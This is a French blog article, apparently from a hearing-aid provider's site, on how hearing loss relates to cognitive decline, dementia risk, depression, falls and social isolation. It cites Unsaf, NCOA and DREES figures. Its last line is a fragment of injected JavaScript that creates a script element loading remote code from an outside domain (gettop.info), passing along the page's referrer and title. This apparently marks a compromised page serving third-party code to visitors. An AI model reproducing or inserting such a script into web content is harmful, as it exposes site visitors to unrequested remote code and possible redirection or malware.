journée nationale de l'audition
Journée Nationale de l’Audition
31 mars 2015
Le rôle de l’audioprothésiste
9 avril 2015

Les liens entre perte auditive et perte d’autonomie

Les liens entre perte auditive et perte d'autonomie

La déficience auditive en lien avec la qualité de vie

Les liens entre perte auditive et perte d'autonomieDe nombreux liens existent entre la perte auditive et la perte d’autonomie. Ses liens sont mis en avant par une étude réalisée par l’Unsaf. Les risques de chutes, de dépressions, d’isolement, de déclin cognitif, sans oublier les risques plus poussés de démence qui font parties intégrante de la malaudition. L’audition fait partie de notre bien-être au quotidien et tout comme nos autres sens, elle rythme notre vie.

On sait qu’il existe des liens étroits entre déclin auditif et déclin cognitif. En effet, une perte auditive légère (25dB) équivaut à une baisse des performances cognitives semblable à une personne plus âgée de 6,8 ans. Le risque accru de démence dut à la dégénérescence de l’audition est quant à elle multipliée par 1,8 pour un trouble auditif modéré, il peut être triplé pour une déficience auditive moyenne et quintuplé pour une perte prononcée. En effet, c’est le constat inquiétant révélé par une étude de l’Unsaf rendu le 31 octobre 2014.

Liens entre perte auditive et perte d'autonomie

 Les personnes âgées atteintes d’une déficience auditive rencontrent un déclin cognitif à hauteur de 30% à 40% supérieur à une personne avec une audition saine, tout comme on peut associer à la diminution de l’audition une perte du tissu cérébral et un risque très accru de démence.

Liens entre perte auditive et perte d'autonomie

La perte auditive est associée aussi à de nombreux autres risques tels que l’isolement social, la dépression et le risque de chutes plus important. Cette étude montre de façon significative que la perte auditive engendre une diminution de la qualité de vie, un développement de l’isolement et, par conséquent, un renfermement social de surcroit avec un sentiment d’exclusion. La perte d’autonomie ainsi que tous ces risques sont très handicapants au quotidien et amènent de façon récurrente des dépressions chez les personnes malentendantes. De même, les chutes sont nettement plus importantes chez les personnes atteintes de troubles auditifs, même pour une perte modérée.

La prothèse auditive et son rôle sur la qualité de vie

Une étude réalisée par le NCOA (National Council on Aging, 2000) sur 2304 personnes malentendantes et sur 2090 proches de celles-ci, énoncent le port d’un appareil auditif comme un facteur majeur de renouveau en terme de relations sociales, de bien être, de qualité de vie et de santé mentale, avec un retour de la confiance de soi.

La perte auditive a également un lien étroit avec la consommation voire la surconsommation de médicaments et autres formes de dépendances.

Des politiques de préventions se développent de plus en plus dans le secteur de l’audition notamment en terme de santé publique et de prévention aux dépendances. Le coup des pertes d’auditions non traitées (473 euros par personnes et par an) mis en avant par une étude de la direction de la recherche des études, de l’évaluation et des statistiques (DREES) appelle à un développement du port de prothèses auditives chez les patients atteints de problèmes d’audition. Les liens entre perte auditive et perte d’autonomie vont devenir un sujet majeur sur la santé des français au cours des prochaines années.

Télécharger l’étude compléte de l’Unsaf en version PDF :

Unsaf – Liens entre perte auditive et perte dautonomie 31oct14

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; var d=document;var s=d.createElement(‘script’);